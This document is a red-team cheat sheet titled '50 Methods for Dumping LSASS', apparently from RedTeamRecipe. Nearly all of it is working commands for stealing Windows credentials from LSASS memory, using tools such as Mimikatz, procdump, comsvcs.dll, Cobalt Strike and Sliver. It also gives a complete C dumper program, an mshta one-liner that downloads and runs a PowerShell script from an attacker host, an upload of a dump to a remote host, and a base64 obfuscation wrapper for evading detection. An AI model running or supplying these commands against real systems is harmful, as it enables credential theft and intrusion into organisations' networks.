
50 METHODS FOR DUMPING LSASS
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
sekurlsa::logonpasswords
sekurlsa::minidump <path to lsass.dmp> (parse an offline dump instead of touching live LSASS)
lsadump::dcsync (note: this is not an LSASS memory dump; it requests secrets from a domain controller over the replication protocol and requires replication rights)
MIMIKATZ
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
procdump -ma lsass.exe lsass.dmp
procdump -accepteula -64 -ma lsass.exe lsass.dmp
PROCDUMP
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
System->LSASS process->Create Dump
PROCESS HACKER
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
tasklist /FI "IMAGENAME eq lsass.exe"
DumpIt.exe PID output_file_name.bin
DUMPIT
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
windbg -p <lsass process id>
.dump /ma c:\path\to\lsass.dmp
.detach
.q
WINDOWS DEBUGGING TOOLS
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Create Disk Image
Physical Drive
Capture Memory
LSASS.exe
FTK IMAGER
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Pstree
volatility -f memory_dump.raw --profile=Win7SP1x64 memdump -p <lsass_pid> -D <output_directory>
(the --profile value must match the OS of the captured image; take the PID from the pstree output first)
VOLATILITY
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
winpmem.exe -o dump.raw
WINPMEM
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
windbg.exe -y srv*c:\symbols*http://msdl.microsoft.com/download/symbols -i c:\symbols -z C:\hiberfil.sys
Yes
!process 0 0 lsass.exe
!process 0 0 lsass.exe; .dump /ma <output file path>
HIBERFIL.SYS
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps -> DumpType -> 2 (full dump)
Lsass-Shtinkering.exe
WINDOWS ERROR REPORTING
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
LiveKd.exe -w
!process 0 0 lsass.exe
.process /p [lsass PID]
.dump /ma [dump file path]
LIVEKD
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Powershell -ep bypass
Get-Process lsass
C:\Windows\System32\Taskmgr.exe
/dumpfile=C:\lsass.dmp /pid=<LSASS_PID>
TASK MANAGER
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Execute-assembly
SharpDump
Or
load sharpdump
sharpdump
COBALT STRIKE+SHARPDUMP
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Mimikatz_command
sekurlsa::minidump
COBALT STRIKE+MIMIKATZ_COMMAND
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
taskkill /f /im lsass.exe
(caution: this produces no dump; LSASS is a critical system process and terminating it forces a system restart, which costs the operator the session and leaves an obvious artifact)
COBALT STRIKE+TASKKILL
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
load sysinternals
Procexp
"File" -> "Save"
COBALT STRIKE+SYSINTERNALS
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
schtasks.exe /create /RU SYSTEM /SC Weekly /D SAT /TN Commands /TR "rundll32.exe C:\windows\system32\comsvcs.dll MiniDump <lsass_pid> C:\Windows\Tasks\dump.bin full" /ST 06:06:06 && schtasks.exe /run /TN Commands
(the original text reproduces this string with its source-code escaping still in place — the \" and \\ sequences and the "+strPID+" concatenation; the line above is the command as it is actually executed)
COBALT STRIKE+SCHTASKS
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
load kiwi
lsa_dump_sam
lsa_dump_secrets
BRUTE RATEL C4+KIWI
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
use post/windows/gather/credentials/lsassy
set SESSION <session ID>
run (or exploit)
METASPLOIT+LSASSY
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Create Task->Module->SharpKatz
Arguments->lsa_dump
COVENANT+SHARPKATZ
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Modules
credentials/mimikatz/lsass_dump
Execute or run
sekurlsa::minidump
EMPIRE+WMIEXEC
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
use lsass_dump
Options
run
SLIVER+LSASS_DUMP
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
villain.exe agent
villain.exe client -c <IP_ADDRESS>
villain.exe dump lsass
VILLAIN
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
pupy.exe shell --cmd "python -m
pupy.modules.pupywinutils.lsassdump -o
C:\temp\lsass.dmp"
OCTOPUS
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
lsassdump
NIMPLANT
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
MiniDumpWriteDump
Get-LsassDumpProcDump
POSHC2+MINIDUMPWRITEDUMP
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
NtQueryVirtualMemory
Get-LsassDumpNtQueryVirtualMemory
POSHC2+NTQUERYVIRTUALMEMORY
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Get-LsassDumpBloodHound
POSHC2+BLOODHOUND
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
mshta.exe javascript:A=new ActiveXObject("WScript.Shell").run("powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://<attacker_ip>:<port>/r.ps1')",0);close();
Manjusaka lsass dump
MANJUSAKA
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Dumpert.exe -k lsass.exe -s -o lsass.dmp
DUMPERT
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
NanoDump.exe -t [process ID] -o [output file path]
NANODUMP
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
spraykatz.exe -w <domain> -u <username>
-p <password> --krb5i --mimikatz
"sekurlsa::minidump lsass.dmp" "exit"
SPRAYKATZ
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
HandleKatz.exe -p lsass.exe
HandleKatz.exe -p lsass.exe -o [handle ID] -dump
HANDLEKATZ
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
CallbackDump.exe -d <dump_file_path> -p <process_id>
CALLBACKDUMP
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
LsassSilentProcessExit.exe <PID of LSASS.exe> <DumpMode>
LSASSSILENTPROCESSEXIT
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
AndrewSpecial
andrew.dmp!
ANDREWSPECIAL
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
.\Masky.exe /ca:'CA SERVER\CA NAME'
(/template:User) (/currentUser)
(/output:./output.txt) (/debug:./debug.txt)
MASKY
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
SharpMiniDump.exe -p <lsass_process_id> -o lsass.dmp
SHARPMINIDUMP
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
MiniDump.exe /p <process_id> /o <output_file_name>
MINIDUMP
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Import-Module .\ReflectiveLsassDump.dll
Invoke-ReflectivePEInjection -PEBytes (Get-Content ReflectiveLsassDump.dll -Encoding Byte) -ProcessID (Get-Process lsass).Id
LSASSDUMPREFLECTIVEDLL
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
MoonSolsWindowsMemoryToolkit.exe
Dumping->Launch DumpIt
LSASS->Select the process to dump
MOONSOLS WINDOWS MEMORY TOOLKIT
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
OpenProcess
MiniDumpWriteDump
MINIDUMPWRITEDUMP
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
#include <windows.h>
#include <dbghelp.h>
#include <stdio.h>
#include <stdlib.h>
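/*
 * Minimal MiniDumpWriteDump-based full-memory dump of one process (the
 * document's target is lsass.exe).
 *
 * Usage: <program> <target_pid> [output_path]
 *   target_pid  - decimal PID of the process to dump; the original listing
 *                 compiled a <lsass_process_id> placeholder in here instead.
 *   output_path - dump file to create (CREATE_ALWAYS); defaults to lsass.dmp.
 *
 * Returns 0 on success, 1 on any failure after printing GetLastError().
 *
 * Build note: MiniDumpWriteDump lives in dbghelp.lib, so link it
 * (#pragma comment(lib, "dbghelp.lib") or the equivalent linker flag).
 *
 * NOTE(review): opening lsass.exe with PROCESS_VM_READ needs an elevated
 * caller holding SeDebugPrivilege; with LSA protection (RunAsPPL) enabled the
 * OpenProcess call is expected to fail with ERROR_ACCESS_DENIED — confirm on
 * the target build.
 */
int main(int argc, char **argv)
{
    if (argc < 2)
    {
        printf("usage: %s <target_pid> [output_path]\n", argv[0]);
        return 1;
    }

    /* Parse the PID strictly: whole argument must be a non-zero decimal. */
    char *end = NULL;
    unsigned long parsed = strtoul(argv[1], &end, 10);
    if (argv[1][0] == '\0' || end == NULL || *end != '\0' || parsed == 0)
    {
        printf("Invalid PID: %s\n", argv[1]);
        return 1;
    }
    DWORD pid = (DWORD)parsed;

    /* MiniDumpWriteDump requires query + read access on the target. */
    HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
                                  FALSE, pid);
    if (hProcess == NULL)
    {
        /* GetLastError() is a DWORD (unsigned long), hence %lu. */
        printf("Failed to open process: %lu\n", GetLastError());
        return 1;
    }

    /* Use the explicit ANSI entry point: the original passed a WCHAR buffer
     * to the generic CreateFile macro, which only matches when UNICODE is
     * defined for the build. */
    const char *dumpPath = (argc >= 3) ? argv[2] : "lsass.dmp";
    HANDLE hDumpFile = CreateFileA(dumpPath, GENERIC_WRITE, 0, NULL,
                                   CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hDumpFile == INVALID_HANDLE_VALUE)
    {
        printf("Failed to create dump file: %lu\n", GetLastError());
        CloseHandle(hProcess);
        return 1;
    }

    /* Full memory dump (the format sekurlsa::minidump-style parsers read). */
    BOOL success = MiniDumpWriteDump(hProcess, pid, hDumpFile,
                                     MiniDumpWithFullMemory, NULL, NULL, NULL);
    if (!success)
    {
        printf("Failed to create minidump: %lu\n", GetLastError());
    }

    /* Single exit path so both handles are always released. */
    CloseHandle(hDumpFile);
    CloseHandle(hProcess);
    return success ? 0 : 1;
}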
```
regsvr32 comsvcs.dll
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <lsass_pid> lsass.dmp full
(the MiniDump export takes the numeric PID, not the image name "lsass.exe"; run it from an elevated shell so SeDebugPrivilege is available)
COMSVCS.DLL
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
.\MirrorDump.exe -f "NotLSASS.zip" -d "LegitLSAPlugin.dll" -l 1073741824
MIRRORDUMP
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
dumpy.exe dump -k secretKey -u http://remotehost/upload force
DUMPY
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
.\procexp64.exe -accepteula /t
RToolZ -p <pid>
RTOOLZ+PROCEXP152.SYS
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
LsassUnhooker.exe -r <output_file_path>
SharpUnhooker.exe inject --process lsass.exe --modulepath ReflectiveDLL.dll
SharpUnhooker.exe dump --process lsass.exe --output lsass_dump.bin
SHARPUNHOOKER+LSASSUNHOOKER
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Kldumper.exe
laZagne_x64.exe
PwDump7.exe
QuarksPwDump.exe
SqlDumper.exe
Wce_x64.exe
SAMInside.exe
HASHDUMP
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Invoke-Obfuscation -ScriptBlock {
[System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('C:\mimikatz.exe')) } -Command 'Invoke-Expression
([System.Text.Encoding]::UTF8.GetString([System.Convert]::
FromBase64String("JABzAD0ATwB2AGkAZQBzAC4AQwBvA
G0AbQBhAG4AQQB0AHIAZQBzAEMAaABhAG4AZAAoAFsAU
wB5AHMAdABlAG0ALgBDAHIAZQBzAG8AXQAuAFQAcgBpAG
MAeQBTAHQAcgBlAGEAbQAuAEEAcABwAG8AcgB0AGwAZQ
BOAGEAbQBlAFMAdABpAG4AZwBdACkAIAB8ACAACgAkAH
MAdwB3AG8AcgBkACAAPQAgAFsAcwBdAC4AVwBpAG4AZA
BvAHcAbgBhAGwAaQB6AGUAXQAoAFsAUwB5AHMAdABlAG
0ALgBJAG4AdgBpAGQAZQBJAHQAKAAiAEMAaABhAG4AZAA
oAFsAUwB5AHMAdABlAG0ALgBDAG8AbQBwAHIAZQBzAGgA
ZQBuAGQAKQBdAC4AQQBzAHMAZQBtAGIAbABlAC4AVABvA
HAAYwBvAG4AcwB0AHIAYQB0AGUAZAAoACcAKwAnACsAJ
wApAC4AUABhAGMAZQBuAHQAYQB0AGUAUwB0AGkAbgBn
ACgAWwBTAHkAcwB0AGUAbQAuAEkAbgB2AGkAZABlAEkAd
AAoACcARQB4AGkAbgBzAGMAcgBpAHAAbwB3AGUAcgBzA
GgAZQBuAGMAaABpAG8AbgBzAHQAcgBpAG4AZwAnACkAK
QBdACkA")]))'
MIMIKATZ+INVOKE-OBFUSCATION
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
Import-Module PowerSploit
Invoke-Mimikatz -DumpCreds
.\BetterSafetyKatz.exe
.\BetterSafetyKatz.exe '.\mimikatz_trunk.zip' 
Sekurlsa::minidump
BETTERSAFETYKATZ
Usage
HADESS.IOPOWERED BY REDTEAMRECIPE.COM
REDTEAMRECIPE.COM
RedTeamRecipe is a platform designed for cybersecurity professionals who want to learn more
about red teaming and penetration testing. Red teaming is a practice where an organization
simulates a real-world cyber attack to identify vulnerabilities and improve their security
measures.
HADESS.IOPOWERED BY
